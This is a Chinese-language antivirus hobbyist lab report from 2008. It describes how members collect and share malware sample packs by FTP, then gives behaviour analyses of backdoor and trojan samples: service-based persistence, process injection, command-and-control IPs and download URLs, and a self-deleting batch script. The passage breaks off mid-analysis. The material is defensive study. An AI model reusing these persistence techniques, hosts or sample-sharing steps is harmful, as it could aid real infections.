doc一. 實驗室概況1. 實驗室人員2. 樣本蒐集與發送流程3. 病毒包測試細則
download 
Report Transcription
一. 實驗室概況1. 實驗室人員2. 樣本蒐集與發送流程3. 病毒包測試細則
一. 實驗室概況 1. 實驗室人員 2. 樣本蒐集與發送流程 3. 病毒包測試細則 4. 分析過的樣本命名規則 5. 運作流程圖 二. 分析報告 1. Backdoor2008.12.24@001 2. Backdoor2008.12.24@002 3. [email protected] 4. [email protected] 5. Backdoor2008.12.24@005 6. Backdoor2008.12.24@006 7. Trojan2008.12.24@001 8. Trojan2008.12.24@002 9. Trojan2008.12.24@003 10. Trojan2008.12.24@004 11. Trojan2008.12.24@005 12. Trojan2008.12.24@006 13. Trojan2008.12.24@007 14. Trojan2008.12.24@008 15. Trojan2008.12.24@009 16. Virus2008.12.24@001 17. Worm2008.12.24@001 18. Worm2008.12.24@002 19. Worm2008.12.24@003 三. 防毒軟體測試報告 1. A-Squared Anti-Malware 4.0 2. Avira Antivir Personal 3. 費爾托斯特 V7R3 4. SearchGUI 5. Kaspersky Internet Security 8.0 6. Dr.Web anti-virus 7. Symantec Endpoint Security 8. McAfee VirusScan Plus 9. TrendMicro OfficeScan 10. TrendMicro Internet Securit 11. Kaspersky Anti-Virus 12. 江民防毒 KV2008 13. Panda Internet Security 14. ESET NOD32 Antivirus 15. Norton Internet Security 16. PC Tools Internet Security 17. VBA32 Workerstation 1 18. VBA32 Workerstation 2 19. avast! Antivirus 回到第一頁 實驗室人員 1. 病毒搜集組 integear,kitman231,小韋,mizuhara,tdnj 2.病毒分析組 zha0,asusp4b533,000110, upside,integear,sylovanas 3.防毒測試組 megakotaro,kitman231,Bug,integear, 戴計,JusticeH,PHT,小韋,小狄~,shisin, kennyg,ss30102,kingyeh,tdnj,imdino,lmam w12345k,haol,no.20.fanks 4.公關報告組 JusticeH,ss30102 回到第一頁 樣本蒐集與發送流程 1.樣本請以 EXE 檔為蒐集目標. 2.上傳樣本要以"ZIP"格式壓縮.檔名的格式為:"樣本名(可以不加副檔名)_cv_會員 ID(中文 ID 的對應英文 ID).zip",之後登入"VirusDatas"的"CollectedVirus"後(FTP 登 入方法)便可以上傳. 病毒分析組部分: 1.從"VirusDatas"的"CollectedVirus"下載樣本,並刪除(以免重複分析),之後請上傳 一份原樣本到"VirusBackup"(以便備查). 2.分析完後,請將樣本重新命名後(規則請參照下方),之後再上傳至 FTP 的 "AnalyzedVirus". 3.之後把分析報告傳送至"VirusReports"的"AnalyzerReports",報告格式請一律使 用 TXT 檔,方便快速,報告命名方式為:"分析後的威脅名稱_ar_會員 ID(中文 ID 的對 應英文 ID)". 公關報告組部分: 1.每一個月(暫定)發布前 7 天定期從"VirusReports"的"AnalyzedVirus"下載所有的 樣本並打包成樣本包,其命名格式為:"AVPClubVirusPack_2009.01.01". 2.發布前 3 天便可以開始彙整所有資料,並於最後一天整理成 PDF 檔發布於論壇 上,該報告命名方式為:"ACVL_VirReport_2009.01.01". 防毒測試組部分: 1.從"VirusDatas"的"FinalVirusPack"下載樣本包做測試,並將報告(內容範例請參照 下方)上傳到"VirusReports"的"AntiVirusSoftwaresReports",報告命名方式為:"防毒 軟體名稱_avsr_會員 ID(中文 ID 的對應英文 ID).txt" 2.必須在"AVPClub VirLab 流行威脅研究報告"每個月發布前 3 天把報告上傳完成. 回到第一頁 病毒包測試細則 1. 照著格式儲存成 txt 檔提交報告給第 4 組 防毒軟體:請附上全名(如:AVPClub AntiVirus Plus) 防毒軟體版本:請以防毒廠商之代號(如:Kaspersky 是"8.0.0.506",F-PROT 是" 6.0.9.1",ESET 是"3.0.684") 病毒碼日期:以測試當天為日期(如:2008/01/01) 啟發式設定:高度啟發/中度啟發/基本啟發/預設啟發(預設啟發是指防毒軟體 本身無法更改啟發式程度) 測試環境:作業系統(如:Windows Vista Ultimate SP1 x86) 備註:請自選,沒有請寫"無" 防毒軟體顯示:已偵測:19/已掃描:58 實際檔案數:19(肉眼所見為憑) 移除檔案數:19(肉眼所見為憑) 剩餘檔案數:0(肉眼所見為憑) 未偵測到:0(肉眼所見為憑) 偵測到但只能隔離:0 偵測到但未移除:0 偵測到但無法做出任何動作:0 偵測率:19/19=100.0% 移除率:19/19=100.0% 剩餘檔案名稱: 無 偵測到但未移除檔案名稱: 無 偵測到但只能隔離的檔案名稱: 無 偵測到但無法做出任何動作的檔案名稱: 無 測試人員:會員 ID(如:Bug) 2.在測試組人員收到毒包完成訊息時 必須於 1~3 周內交給第四組報告 3.如果"啟發式"因為設定不同而有不同的結果 請用兩份以上的報告 4.若有事情無法交出報告請是先告知 5.若有其他的設定.請在"其他"那欄填寫 回到第一頁 分析過的樣本命名規則 經過各方建議,在此統一"病毒分析組"上傳樣本的命名規則 . 以趨勢科技的命名規則為基底: 主要行為!次要行為_數字排序(上傳時,請依照"報數原則",如果已經有人先行上傳 001,則後上傳檔名應為 002,不分種類) 以下是大量例子: TROJ!DownLoader_001_ad_會員 ID(木馬,次要行為是"下載者") WORM!DownLoader_002_ad_會員 ID(蠕蟲,次要行為是"下載者") BKDR!AutoRun_003_ad_會員 ID(後門,次要行為是"自動啟動") VIRS!KillFiles_005_ad_會員 ID(病毒,次要行為是"刪除檔案") VIRS!Inject_006_ad_會員 ID(病毒,次要行為是"感染檔案") TSPY!PWStealer_007_ad_會員 ID(間諜程式,次要行為是"密碼竊取者") TADE!DownLoader_008_ad_會員 ID(廣告程式,次要行為是"下載者") DIAL!PWStealer_009_ad_會員 ID(撥號程式,次要行為是"密碼竊取者") TROJ!PWStealer_010_ad_會員 ID(木馬,次要行為是"密碼竊取者") 如有問題,請 PM 在下詢問! 之後公關報告組只需要另外整理成樣本包,並且把後面的"_ad_會員 ID"刪除即可 註:於第二篇報告開始實施 . 回到第一頁 運作流程圖 回到第一頁 1.exe 的分析報告 一般資訊 : 分析日期 : 2008-12-06 可執行 : 是 檔案類型 : EXE () 上傳者 : 000110 分析者 : 000110 病毒檔案名:Backdoor2008.12.24@001 樣本骨幹圖 : 1.exe ├ services.exe │ └ liocal.exe │ └ svchost.exe └ cmd.exe 1.exe 的行為分析 : 建立檔案 : C:\WINDOWS\Liocal.exe C:\Documents and Settings\[User Name]\Local Settings\Temp\GOLBUB.bat //生成的檔案名稱為 6 個隨機英文字符 寫入檔案 : C:\WINDOWS\Liocal.exe C:\Documents and Settings\[User Name]\Local Settings\Temp\GOLBUB.bat 建立新的處理程序 : 路徑 程式名稱 啟動參數 c:\windows\system32\ cmd.exe /c C:\DOCUME~1\[User Name]\LOCALS~1\Temp\GOLBUB.bat 存取 Service Control Manager : c:\windows\system32\services.exe //危險行為, 導致 services.exe 安裝 服務 services.exe 的行為分析 : 建立登錄機碼 : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AVG Anti_Spyware Guard HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AVG Anti_Spyware Guard\Security 設定登錄資料 : 路徑 名稱 數值 HKEY_LOCAL_MACHINE\SYSTEM\Current Type 0x00000110(272) Start 0x00000002(2) ControlSet\Services\AVG Anti_Spyware Guard\ HKEY_LOCAL_MACHINE\SYSTEM\Current ControlSet\Services\AVG Anti_Spyware Guard\ //啟動類型為 “自動” , 每次系統啟動時將會執行 HKEY_LOCAL_MACHINE\SYSTEM\Current ErrorContr ControlSet\Services\AVG Anti_Spyware ol 0x00000000(0) Guard\ HKEY_LOCAL_MACHINE\SYSTEM\Current ImagePath C:\WINDOWS\Liocal.exe HKEY_LOCAL_MACHINE\SYSTEM\Current DisplayNa AVG Anti_Spyware Guard ControlSet\Services\AVG Anti_Spyware me ControlSet\Services\AVG Anti_Spyware Guard\ Guard\ HKEY_LOCAL_MACHINE\SYSTEM\Current Security 01 00 14 80 90 00 00 00 9c ControlSet\Services\AVG Anti_Spyware 00 00 00 14 00 00 00 30 Guard\Security\ 00 00 00 02 00 1c 00 01 00 00 00 02 80 14 00 ff 01 0f 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 fd 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 ff 01 0f 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8d 01 02 00 01 01 00 00 00 00 00 05 0b 00 00 00 00 00 18 00 fd 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00 HKEY_LOCAL_MACHINE\SYSTEM\Current ObjectNa ControlSet\Services\AVG Anti_Spyware me LocalSystem Guard\ HKEY_LOCAL_MACHINE\SYSTEM\Current Descriptio AVG Anti-Virus provides ControlSet\Services\AVG Anti_Spyware n anti-virus services to Guard\ applications and performs real-time protection //以上登錄資料動作將建立一項服務 建立新的處理程序 : 路徑 程式名稱 c:\windows\ liocal.exe //由於服務已設定為“自動啟動” liocal.exe 的行為分析 : 建立新的處理程序 : 啟動參數 路徑 程式名稱 啟動參數 C:\WINDOWS\system32\ svchost.exe 73412 存取其它處理程序的記憶體 : c:\windows\system32\svchost.exe 在其他處理程序中建立執行緒 : c:\windows\system32\svchost.exe cmd.exe 的行為分析 : 刪除檔案 : C:\Documents and Settings\[User Name]\桌面\tavo\1.EXE C:\Documents and Settings\[User Name]\Local Settings\Temp\GOLBUB.bat svchost.exe 的行為分析 : 建立連線 : TCP - 124.226.42.36:2009 附加資訊 : 其他行為 : 無 GOLBUB.bat 的檔案內容 : :try del "C:\Documents and Settings\[User Name]\桌面\tavo\1.EXE" if exist "C:\Documents and Settings\[User Name]\桌面\tavo\1.EXE" goto try del %0 exit 分析結果 : 病毒類型 : Backdoor 回到第一頁 2.exe 的分析報告 一般資訊 : 分析日期 : 2008-12-03 可執行 : 是 檔案類型 : EXE () 上傳者 : 000110 分析者 : 000110 病毒檔案名:Backdoor2008.12.24@002 樣本骨幹圖 : 2.exe └ rundll32.exe └ services.exe └ svchost.exe 2.exe 的行為分析 : 建立檔案 : C:\Documents and Settings\VMware\Local Settings\Temp\4.tmp 寫入檔案 : C:\Documents and Settings\VMware\Local Settings\Temp\4.tmp 建立新的處理程序 : 路徑 程式名稱 c:\windows\system32\ rundll32.exe 啟動參數 "C:\DOCUME~1\VMware\LOCALS~ 1\Temp\4.tmp" "8A'?________[___[(_______'-6_ _'?窐 '___'IU>#>" rundll32.exe 的行為分析 : 建立檔案 : C:\WINDOWS\system32\Local.dll 寫入檔案 : C:\WINDOWS\system32\Local.dll 建立登錄機碼 : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalServic e\Parameters 設定登錄資料 : 路徑 名稱 數值 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Descri (HID)的通過輸入訪 Services\LocalService\ ption 問 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Servic C:\WINDOWS\syste Services\LocalService\Parameters\ eDll m32\Local.dll // “LocalService” 服務的啟動參數 存取 Service Control Manager : c:\windows\system32\services.exe //危險行為, 導致 services.exe 安裝 服務 services.exe 的行為分析 : 建立登錄機碼 : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalServic e HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalServic e\Security 設定登錄資料 : 路徑 名稱 HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr Type olSet\Services\LocalService\ 數值 0x00000110(272) HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr Start 0x00000002(2) olSet\Services\LocalService\ //啟動類型為 “自動” , 每次系統啟動時將會執行 HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr ErrorContro 0x00000000(0) olSet\Services\LocalService\ l HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr ImagePath C:\WINDOWS\syste olSet\Services\LocalService\ m32\svchost.exe -k netsvcs HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr DisplayNa intreface Device olSet\Services\LocalService\ Access me HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr Security 01 00 14 80 90 00 00 olSet\Services\LocalService\Security\ 00 9c 00 00 00 14 00 00 00 30 00 00 00 02 00 1c 00 01 00 00 00 02 80 14 00 ff 01 0f 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 fd 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 ff 01 0f 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8d 01 02 00 01 01 00 00 00 00 00 05 0b 00 00 00 00 00 18 00 fd 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00 HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr ObjectNam olSet\Services\LocalService\ LocalSystem e //以上登錄資料動作將建立一項服務 svchost.exe 的行為分析 : 建立連線 : TCP - 123.147.0.145:8080 附加資訊 : 其他行為 : 1. 由於服務的啟動類型為 “自動”, svchost.exe 已載入 Local.dll 分析結果 : 病毒類型 : Backdoor 回到第一頁 樣本名:AntivirusXP_016_MT3wM.exe 類型:Trojan-Backdoor 病毒檔案名:[email protected] 上傳者:kitman231 分析者:asusp4b533 分析日期:20081206 分析工具:ThreatExpert 可執行:是 備註: 會允許外面的電腦連進中毒電腦,造成後門 回到第一頁 LiteVideocodecVer.4.exe 的分析報告 一般資訊 : 分析日期 : 2008-12-05 可執行 : 是 檔案類型 : EXE 上傳者 : integear 分析者 : integear 樣本骨幹圖 : LiteVideocodecVer.4.exe //母體 └SVCHOST.exe //生成物 LiteVideocodecVer.4.exe 的行為分析 : 建立檔案 : SVCHOST.exe //生成物 LiteVideocodecVer.4.exe //母體 建立服務: SVCHOST(狀態:停止) 建立新的處理程序 : SVCHOST.exe //生成物 LiteVideocodecVer.4.exe //母體 建立登錄檔 : [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SVCHOST] Type = 0x00000110 Start = 0x00000002 ErrorControl = 0x00000000 ImagePath = "%Windir%\SVCHOST.exe" DisplayName = "SVCHOST" ObjectName = "LocalSystem" Description = "ϵͳ� � � � " [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SVCHOST\Security ] Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SVCHOST\Enum] 0 = "Root\LEGACY_SVCHOST\0000" Count = 0x00000001 NextInstance = 0x00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SVCHO ST] NextInstance = 0x00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SVCHO ST\0000] Service = "SVCHOST" Legacy = 0x00000001 ConfigFlags = 0x00000000 Class = "LegacyDriver" ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}" DeviceDesc = "SVCHOST" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SVCHO ST\0000\Control] *NewlyCreated* = 0x00000000 ActiveService = "SVCHOST" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SVCHOST] Type = 0x00000110 Start = 0x00000002 ErrorControl = 0x00000000 ImagePath = "%Windir%\SVCHOST.exe" DisplayName = "SVCHOST" ObjectName = "LocalSystem" Description = "ϵͳ� � � � " [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SVCHOST\Security] Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SVCHOST\Enum] 0 = "Root\LEGACY_SVCHOST\0000" Count = 0x00000001 NextInstance = 0x00000001 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SVCHOST] NextInstance = 0x00000001 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SVCHOST\ 0000] Service = "SVCHOST" Legacy = 0x00000001 ConfigFlags = 0x00000000 Class = "LegacyDriver" ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}" DeviceDesc = "SVCHOST" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SVCHOST\ 0000\Control] *NewlyCreated* = 0x00000000 ActiveService = "SVCHOST" 修改登錄檔: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceC urrent] (Default) = 0x0000000C [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceCurrent] (Default) = 0x0000000C [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4] CachePath = "%Profiles%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3] CachePath = "%Profiles%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2] CachePath = "%Profiles%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1] CachePath = "%Profiles%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths] Directory = "%Profiles%\LocalService\Local Settings\Temporary Internet Files\Content.IE5" 下載檔案: http://zhmlove.dx2.yilehost.cn/ip.txt 分析結果 : 病毒類型 : Backdoor-Hupigon 病毒檔案名:[email protected] 回到第一頁 V1.6.exe 的分析報告 一般資訊 : 分析日期 : 2008-12-05 可執行 : 是 檔案類型 : EXE 上傳者 : integear 分析者 : integear 樣本骨幹圖 : V1.6.exe //母體 V1.6.exe 的行為分析 : 建立檔案 : V1.6.exe //母體 建立新的處理程序 : V1.6.exe //母體 修改 Host: www.jingziwww.cn 下載檔案: http://www.jingziwww.cn/kabakeytxt/key.txt http://www.jingziwww.cn/kabakeytxt/keyurl.txt http://www.jingziwww.cn/kabakeytxt/date.txt http://www.jingziwww.cn/kabakeytxt/update1.7.txt 分析結果 : 病毒類型 : Backdoor-Hupigon 病毒檔案名:Backdoor2008.12.24@006 回到第一頁 樣本名:A0008739.exe 類型:Trojan-Adware-BHO 病毒檔案名:Trojan2008.12.24@001 上傳者:mizuhara 分析者:asusp4b533 分析日期:20081206 分析工具:ThreatExpert 可執行:是 建立檔案: * %DesktopDir%\Cheap Pharmacy Online.url * %DesktopDir%\Search Online.url * %DesktopDir%\SMS TRAP.url * %DesktopDir%\VIP Casino.url * %System%\axvitu.dll * %System%\c.ico * %System%\m.ico * %System%\p.ico * %System%\s.ico 程序及記憶體行為: DLL 遠端注入: %System%\axvitu.dll -> IEXPLORE.EXE 登錄檔建立行為: * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49 DC-94CE-9079F7F75F4E} * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49 DC-94CE-9079F7F75F4E}\InprocServer32 * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49 DC-94CE-9079F7F75F4E}\ProgID * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49 DC-94CE-9079F7F75F4E}\Programmable * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49 DC-94CE-9079F7F75F4E}\TypeLib * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49 DC-94CE-9079F7F75F4E}\VersionIndependentProgID * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4 010-BF17-544D1D390117} * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4 010-BF17-544D1D390117}\ProxyStubClsid * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4 010-BF17-544D1D390117}\ProxyStubClsid32 * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4 010-BF17-544D1D390117}\TypeLib * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4 33F-8B51-4C6E85B4605B} * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4 33F-8B51-4C6E85B4605B}\ProxyStubClsid * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4 33F-8B51-4C6E85B4605B}\ProxyStubClsid32 * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4 33F-8B51-4C6E85B4605B}\TypeLib * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41 A5-A7FA-3B376D69E226} * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41 A5-A7FA-3B376D69E226}\1.0 * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41 A5-A7FA-3B376D69E226}\1.0\0 * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41 A5-A7FA-3B376D69E226}\1.0\0\win32 * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41 A5-A7FA-3B376D69E226}\1.0\FLAGS * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41 A5-A7FA-3B376D69E226}\1.0\HELPDIR * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CLSID * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CurVer * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1 * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1\CLSID * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\Browser Helper Objects * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\Browser Helper Objects\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E} * HKEY_CURRENT_USER\Software\Microsoft\Bind o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49 DC-94CE-9079F7F75F4E}\VersionIndependentProgID] + (Default) = "AlsaLi" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49 DC-94CE-9079F7F75F4E}\TypeLib] + (Default) = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49 DC-94CE-9079F7F75F4E}\ProgID] + (Default) = "AlsaLi.1" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49 DC-94CE-9079F7F75F4E}\InprocServer32] + (Default) = "%System%\axvitu.dll" + ThreadingModel = "Apartment" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49 DC-94CE-9079F7F75F4E}] + (Default) = "Almsms" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-54744010-BF17-544D1D390117}\TypeLib] + (Default) = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" + Version = "1.0" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-54744010-BF17-544D1D390117}\ProxyStubClsid32] + (Default) = "{00020420-0000-0000-C000-000000000046}" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474- 4010-BF17-544D1D390117}\ProxyStubClsid] + (Default) = "{00020420-0000-0000-C000-000000000046}" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-54744010-BF17-544D1D390117}] + (Default) = "_IbduczwEvents" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4 33F-8B51-4C6E85B4605B}\TypeLib] + (Default) = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" + Version = "1.0" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4 33F-8B51-4C6E85B4605B}\ProxyStubClsid32] + (Default) = "{00020424-0000-0000-C000-000000000046}" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4 33F-8B51-4C6E85B4605B}\ProxyStubClsid] + (Default) = "{00020424-0000-0000-C000-000000000046}" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-4 33F-8B51-4C6E85B4605B}] + (Default) = "Ibduczw" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-4 1A5-A7FA-3B376D69E226}\1.0\0\win32] + (Default) = "%System%\axvitu.dll" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-4 1A5-A7FA-3B376D69E226}\1.0\HELPDIR] + (Default) = "%System%\" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-4 1A5-A7FA-3B376D69E226}\1.0\FLAGS] + (Default) = "0" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-4 1A5-A7FA-3B376D69E226}\1.0] + (Default) = "ssxzzw Library" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CurVer] + (Default) = "AlsaLi.1" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CLSID] + (Default) = "{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi] + (Default) = "Almsms" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1\CLSID] + (Default) = "{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}" o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1] + (Default) = "Almsms" o [HKEY_CURRENT_USER\Software\Microsoft\Bind] + comment2 = "5xxx3913705" 備註: 建立連外連線: lookfornewsoftware.com 下載網頁: http://lookfornewsoftware.com/cfg1.php http://lookfornewsoftware.com/cfg2.php 回到第一頁 cao.exe 的分析報告 一般資訊 : 分析日期 : 2008-12-05 可執行 : 是 檔案類型 : EXE (Packed With UPack) 上傳者 : kitman231 分析者 : 000110 樣本骨幹圖 : cao.exe ├ rundll32.exe │ └ cmd.exe │ └ zsmscc071001.exe │ └ iexplore.exe └ cmd.exe (第 2 次執行) cao.exe 的行為分析 : 建立檔案 : C:\WINDOWS\system32\zsmscc071001.exe C:\WINDOWS\zsmscc16.ini C:\WINDOWS\system32\zsmscc071001.dll c:\nmDelm.bat 寫入檔案 : C:\WINDOWS\system32\zsmscc071001.exe C:\WINDOWS\zsmscc16.ini C:\WINDOWS\system32\zsmscc071001.dll C:\nmDelm.bat 建立登錄機碼 : HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Expl orer\run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ex plorer 設定登錄資料 : 路徑 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft 名稱 zsmscc 數值 rundll32.exe \Windows\CurrentVersion\policies\Explorer\r un\ //系統啟動時將自動執行指定的程式 建立新的處理程序 : 路徑 程式名稱 c:\windows\system32 rundll32.exe \ c:\windows\system32 cmd.exe \ //第 2 次 cmd.exe 執行 C:\WINDOWS\system32\zsmscc 071001.dll mymain 啟動參數 C:\WINDOWS\system32\zsmscc071001.dll mymain /c c:\nmDelm.bat rundll32.exe 的行為分析 : 建立檔案 : c:\downf.bat 寫入檔案 : C:\downf.bat 建立新的處理程序 : 路徑 程式名稱 c:\windows\system32\ cmd.exe //第 1 次 cmd.exe 執行 cmd.exe 的行為分析 (第 1 次) : 建立新的處理程序 : 路徑 程式名稱 c:\windows\system32\ zsmscc071001.exe 啟動參數 /c c:\downf.bat 啟動參數 i 刪除檔案 : C:\downf.bat cmd.exe 的行為分析 (第 2 次) : 刪除檔案 : %Patch%\cao.exe //%Patch%對應檔案 cao.exe 的相對位置 C:\nmDelm.bat zsmscc071001.exe 的行為分析 : 建立檔案 : C:\WINDOWS\system32\zsmscc32.dll 寫入檔案 : C:\WINDOWS\zsmscc16.ini C:\WINDOWS\system32\zsmscc32.dll 建立新的處理程序 : 路徑 c:\program files\internet explorer\ 程式名稱 iexplore.exe 啟動參數 存取其它處理程序的記憶體 : c:\program files\internet explorer\iexplore.exe 